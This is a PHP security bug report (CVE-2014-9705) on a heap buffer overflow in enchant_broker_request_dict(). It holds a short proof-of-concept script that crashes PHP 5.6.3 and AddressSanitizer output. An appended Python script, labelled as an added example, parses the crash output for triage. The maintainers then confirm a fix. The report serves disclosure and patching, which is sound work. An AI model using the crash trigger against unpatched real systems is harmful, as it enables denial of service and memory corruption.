Sec Bug #68552 heap buffer overflow in enchant_broker_request_dict()
Submitted: 2014-12-05 13:15 UTC Modified: 2015-03-18 12:11 UTC
From: advisory at htbridge dot ch Assigned: tony2001 (profile)
Status: Closed Package: Reproducible crash
PHP Version: 5.6.3 OS: Ubuntu 14.04.1 LTS 32bit
Private report: No CVE-ID: 2014-9705
 [2014-12-05 13:15 UTC] advisory at htbridge dot ch
Description:
------------
The following test case crashes php as it tries to read invalid memory.

The write heap overflow from ASAN is not always reproducible - you need to run the test case a couple of times to get it.

Also affects 64-bit systems.

PoC
========

<?php
// Request the same dictionary repeatedly from a single broker; the repeated
// requests trigger the out-of-bounds write in enchant_broker_request_dict()
// shown in the sanitizer output below.
$tag = 'en_US';
$r = enchant_broker_init();
$d = enchant_broker_request_dict($r, $tag);
enchant_dict_quick_check($d, 'one', $suggs);
$d = enchant_broker_request_dict($r, $tag);
enchant_dict_quick_check($d, 'one', $suggs);
$d = enchant_broker_request_dict($r, $tag);
?>


Result:
========
[Fri Dec  5 13:32:59 2014]  Script:  '/home/symeon/Desktop/dict.php'
---------------------------------------
/home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c(554) : Block 0xb3256a2c status:
Beginning:      OK (allocated on /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:554, 4 bytes)
    Start:  OK
      End:  Overflown (magic=0x00000034 instead of 0xAF9A0F68)
            At least 4 bytes overflown
---------------------------------------
=================================================================
==4350== ERROR: AddressSanitizer: heap-buffer-overflow on address 0xaf9a0f78 at pc 0x84ee4e8 bp 0xbffa7a78 sp 0xbffa7a6c
WRITE of size 4 at 0xaf9a0f78 thread T0
    #0 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
    #1 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
    #2 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
    #3 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
    #4 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
    #5 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
    #6 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
    #7 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
    #8 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
    #9 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
    #10 0x807d080 in _start ??:?
0xaf9a0f78 is located 248 bytes to the right of 0-byte region [0xaf9a0e80,0xaf9a0e80)
==4350== AddressSanitizer CHECK failed: ../../../../src/libsanitizer/asan/asan_allocator2.cc:216 "((id)) != (0)" (0x0, 0x0)
    #0 0xb617d4b2 in _ZdaPvRKSt9nothrow_t ??:?
    #1 0xb61860cc in _ZN11__sanitizer11CheckFailedEPKciS1_yy ??:?
    #2 0xb616ef1e in ?? ??:0
    #3 0xb61836d3 in __asan_unpoison_stack_memory ??:?
    #4 0xb6184b7f in __asan_report_error ??:?
    #5 0xb617db2e in __asan_report_store4 ??:?
    #6 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
    #7 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
    #8 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
    #9 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
    #10 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
    #11 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
    #12 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
    #13 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
    #14 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
    #15 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287


Regards,
S. Paraschoudis
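Added example (not part of this report and not PHP's own tooling): a Python triage script that parses the two crash reports quoted above, the PHP memory manager block report and the AddressSanitizer report, into structured fields and reduces them to a one-line verdict of the kind a crash-triage pipeline ranks. The sample text is excerpted from the output in this report; the list of engine directories used to skip Zend/SAPI frames and the rule that ranks out-of-bounds writes above reads are this example's own assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: lines excerpted from the crash output in the report above
# (PHP memory manager block report, then the AddressSanitizer report).
SAMPLE_REPORT = """\
/home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c(554) : Block 0xb3256a2c status:
Beginning:      OK (allocated on /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:554, 4 bytes)
    Start:  OK
      End:  Overflown (magic=0x00000034 instead of 0xAF9A0F68)
            At least 4 bytes overflown
---------------------------------------
=================================================================
==4350== ERROR: AddressSanitizer: heap-buffer-overflow on address 0xaf9a0f78 at pc 0x84ee4e8 bp 0xbffa7a78 sp 0xbffa7a6c
WRITE of size 4 at 0xaf9a0f78 thread T0
    #0 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
    #1 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
    #2 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
    #3 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
0xaf9a0f78 is located 248 bytes to the right of 0-byte region [0xaf9a0e80,0xaf9a0e80)
==4350== AddressSanitizer CHECK failed: ../../../../src/libsanitizer/asan/asan_allocator2.cc:216 "((id)) != (0)" (0x0, 0x0)
    #0 0xb617d4b2 in _ZdaPvRKSt9nothrow_t ??:?
    #1 0xb61860cc in _ZN11__sanitizer11CheckFailedEPKciS1_yy ??:?
"""

@dataclass
class Frame:
    index: int
    function: str
    file: str               # "??" when the symbolizer had no source information
    line: Optional[int]

@dataclass
class CrashReport:
    error_kind: Optional[str] = None      # e.g. "heap-buffer-overflow"
    fault_addr: Optional[int] = None
    access: Optional[str] = None          # "READ" or "WRITE"
    access_size: Optional[int] = None
    frames: List[Frame] = field(default_factory=list)   # stack of the faulting access only
    alloc_file: Optional[str] = None      # from the PHP memory manager block report
    alloc_line: Optional[int] = None
    alloc_bytes: Optional[int] = None
    overflow_bytes: Optional[int] = None

ASAN_ERROR = re.compile(r"^==\d+== ERROR: AddressSanitizer: ([\w-]+) on address (0x[0-9a-fA-F]+)")
ASAN_ACCESS = re.compile(r"^(READ|WRITE) of size (\d+) at 0x[0-9a-fA-F]+")
ASAN_FRAME = re.compile(r"^\s*#(\d+) 0x[0-9a-fA-F]+ in (\S+) (\S+)$")
PHP_ALLOC = re.compile(r"allocated on (\S+?):(\d+), (\d+) bytes")
PHP_OVERFLOW = re.compile(r"At least (\d+) bytes overflown")

def parse_crash_report(text: str) -> CrashReport:
    """Extract the triage-relevant fields from raw crash output."""
    rep = CrashReport()
    collecting = False   # True while reading the stack printed under the access line
    for line in text.splitlines():
        m = ASAN_ERROR.match(line)
        if m and rep.error_kind is None:
            rep.error_kind, rep.fault_addr = m.group(1), int(m.group(2), 16)
            continue
        m = ASAN_ACCESS.match(line)
        if m and rep.access is None:
            rep.access, rep.access_size = m.group(1), int(m.group(2))
            collecting = True
            continue
        m = ASAN_FRAME.match(line)
        if m:
            if collecting:   # frames of later stacks (e.g. the CHECK failure) are ignored
                path, _, lineno = m.group(3).rpartition(":")
                rep.frames.append(Frame(int(m.group(1)), m.group(2), path or "??",
                                        int(lineno) if lineno.isdigit() else None))
            continue
        if collecting and rep.frames:
            collecting = False   # first non-frame line ends the faulting stack
        m = PHP_ALLOC.search(line)
        if m:
            rep.alloc_file, rep.alloc_line, rep.alloc_bytes = (
                m.group(1), int(m.group(2)), int(m.group(3)))
            continue
        m = PHP_OVERFLOW.search(line)
        if m:
            rep.overflow_bytes = int(m.group(1))
    return rep

# Assumption of this example: frames under these directories belong to the PHP
# engine, the SAPI layer or libc start-up, so the first frame elsewhere is the
# most useful place to begin reading (here: the enchant extension).
ENGINE_DIRS = ("/Zend/", "/main/", "/sapi/", "/csu/")

def first_non_engine_frame(rep: CrashReport) -> Optional[Frame]:
    for f in rep.frames:
        if f.file != "??" and not any(d in f.file for d in ENGINE_DIRS):
            return f
    return None

def triage(rep: CrashReport) -> str:
    """One-line verdict; out-of-bounds writes are ranked above reads because
    they corrupt neighbouring heap objects rather than only crashing or leaking."""
    if rep.error_kind is None:
        return "no AddressSanitizer error found"
    where = first_non_engine_frame(rep) or (rep.frames[0] if rep.frames else None)
    site = f"{where.function} ({where.file}:{where.line})" if where else "unknown frame"
    verdict = f"{rep.error_kind}: {rep.access} of {rep.access_size} bytes in {site}"
    if rep.alloc_bytes is not None:
        verdict += f"; block of {rep.alloc_bytes} bytes allocated at {rep.alloc_file}:{rep.alloc_line}"
    if rep.overflow_bytes is not None:
        verdict += f", overrun by at least {rep.overflow_bytes} bytes"
    return verdict + (" [priority: high]" if rep.access == "WRITE" else " [priority: medium]")

if __name__ == "__main__":
    print(triage(parse_crash_report(SAMPLE_REPORT)))
```

Run against the sample, the verdict pairs the 4-byte block allocated at enchant.c:554 with the 4-byte write at enchant.c:571 and the "at least 4 bytes overflown" line, which is the information a maintainer needs before opening the source. Only the stack under the access line is kept; the second stack from the sanitizer's own CHECK failure is skipped so it does not mislead the frame heuristic.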




 [2014-12-19 09:27 UTC] advisory at htbridge dot ch
Did anyone have time to review and confirm the issue?
 [2015-01-26 10:19 UTC] advisory at htbridge dot ch
Friendly reminder, can someone please review it?
Thank you.
 [2015-01-26 11:50 UTC] tony2001@php.net
-Status: Open +Status: Closed -Assigned To: +Assigned To: tony2001
 [2015-01-26 11:50 UTC] tony2001@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

For Windows:

http://windows.php.net/snapshots/

Thank you for the report, and for helping us make PHP better.

Pushed a fix to SVN, thanks!
http://svn.php.net/viewvc/pecl/enchant/trunk/enchant.c?r1=317600&r2=335803
 [2015-03-18 12:11 UTC] kaplan@php.net
-CVE-ID: +CVE-ID: 2014-9705
 